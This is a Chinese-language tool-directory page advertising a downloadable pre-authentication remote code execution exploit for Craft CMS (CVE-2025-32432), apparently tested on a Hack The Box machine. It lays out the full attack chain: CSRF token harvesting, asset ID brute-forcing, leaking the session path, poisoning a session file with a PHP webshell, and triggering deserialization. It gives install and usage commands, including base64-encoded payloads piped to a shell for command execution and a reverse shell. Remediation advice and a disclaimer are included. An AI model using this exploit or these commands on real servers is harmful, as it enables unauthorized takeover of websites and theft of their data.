Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-32432-exploit-by-P34NUT — 针对 Craft CMS 3.x/4.x/5.x 的可靠 CVE-2025-32432 预认证 RCE 漏洞利用,在其他公开 PoC 失效的场景下依然有效 | Kitploit
工具/GitHubGitHub/p34nut2/cve-2025-32432-exploit-by-p34nut
漏洞分析漏洞利用Web应用程序漏洞利用后渗透利用Web安全渗透测试红队远程访问工具Payload 开发

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
GitHubp34nut2/cve-2025-32432-exploit-by-p34nut

CVE-2025-32432-exploit-by-P34NUT

针对 Craft CMS 3.x/4.x/5.x 的可靠 CVE-2025-32432 预认证 RCE 漏洞利用,在其他公开 PoC 失效的场景下依然有效

查看仓库
214小时54分前尚未审核
分享

CVE-2025-32432 — Craft CMS 预认证 RCE 漏洞利用

作者: P34NUT2
漏洞: Craft CMS 中的远程代码执行(预认证)
CVE: CVE-2025-32432
目标: 任何存在漏洞的 Craft CMS 实例(3.x / 4.x / 5.x)— 已在 Hack The Box: Orion 上测试


⚠️ 免责声明

本工具严格仅供教育目的和授权渗透测试使用,适用于受控环境,例如 Hack The Box、TryHackMe 或您拥有或已获得明确书面许可进行测试的私人实验环境。

未经授权对您不拥有或未获得明确测试许可的系统使用本工具是非法的,违反《计算机欺诈与滥用法案》(CFAA)、《欧盟攻击信息系统指令》以及全球大多数司法管辖区的等效法律。

作者对因使用本软件而导致的任何滥用、损害或法律后果不承担任何责任或义务。请负责任且合乎道德地使用。


💡 动机与背景

大多数针对 CVE-2025-32432 的公开 PoC 在面对真实目标(如 HTB: Orion)时会失败,原因如下:

  • URL 参数编码不当
  • 特殊字符(&、>、<)处理错误
  • PHP 会话投毒阶段会话文件被截断

本漏洞利用工具从零构建以解决这些可靠性问题。它正确处理 URL 编码,自动化动态令牌提取,并使用 Base64 包装管道实现对任何存在漏洞的 Craft CMS 实例的可靠执行 — 已针对真实部署进行验证,并在 HTB Orion 上得到证实。


🔗 技术利用链

步骤操作描述
1会话与 CSRF 获取从管理端点提取 CraftSessionId、CRAFT_CSRF_TOKEN 和动态 CSRF_TOKEN
2资产 ID 发现暴力枚举转换生成载荷所需的有效资产 ID
3会话路径泄露注入 Guzzle 对象以触发 phpinfo() 并动态读取 session.save_path
4会话投毒将 URL 编码的 PHP webshell 载荷注入活动会话文件
5RCE 触发反序列化被投毒的会话以执行任意系统命令

📦 安装

root@kitploit:~
git clone https://github.com/P34NUT2/CVE-2025-32432-exploit-by-P34NUT2.git
cd CVE-2025-32432-exploit-by-P34NUT2
pip install -r requirements.txt

🚀 使用方法

参数

标志长选项必需描述
-u--url✅ 是目标基础 URL(例如 http://example.com)
-c--cmd✅ 是在远程目标上执行的命令
-a--asset❌ 否已知的有效资产 ID(可加速执行)
-s--scan-max❌ 否资产 ID 暴力枚举最大范围(默认:300)

示例

1. 基本命令执行

root@kitploit:~
python3 craftcms_rce_exploit_php.py -u http://example.com -c "whoami"

2. 使用已知资产 ID(更快)

root@kitploit:~
python3 craftcms_rce_exploit_php.py -u http://example.com -a 1 -c "id"

3. 编码载荷(推荐用于特殊字符)

为防止特殊字符被 HTTP 解析器更改或在会话处理期间被截断,请在传递命令前对其进行 Base64 编码:

root@kitploit:~
# 步骤 1 — 在本地编码您的命令
echo -n "YOUR_COMMAND_HERE" | base64

# 步骤 2 — 通过脚本传递编码后的字符串
python3 craftcms_rce_exploit_php.py -u http://example.com -c "echo <BASE64_STRING> | base64 -d | sh"

4. 通过 Base64 包装实现反向 Shell

root@kitploit:~
python3 craftcms_rce_exploit_php.py -u http://target.htb -c "echo <B64_PAYLOAD> | base64 -d | bash"

🛡️ 修复建议

如果您是运行 Craft CMS 的系统管理员或开发人员,请应用以下缓解措施:

  • 更新 Craft CMS 至最新修补版本(≥ 5.6.17 / ≥ 4.14.14)。
  • 限制访问管理操作端点(/actions/*),通过防火墙规则或中间件实现。
  • 加固 PHP 会话目录 — 确保它们不可被不受信任的 Web 进程写入。
  • 监控应用程序和 Web 服务器日志中的异常反序列化活动。

📄 许可证

本项目仅授权用于教育和授权测试用途。详情请参阅 LICENSE。

下载工具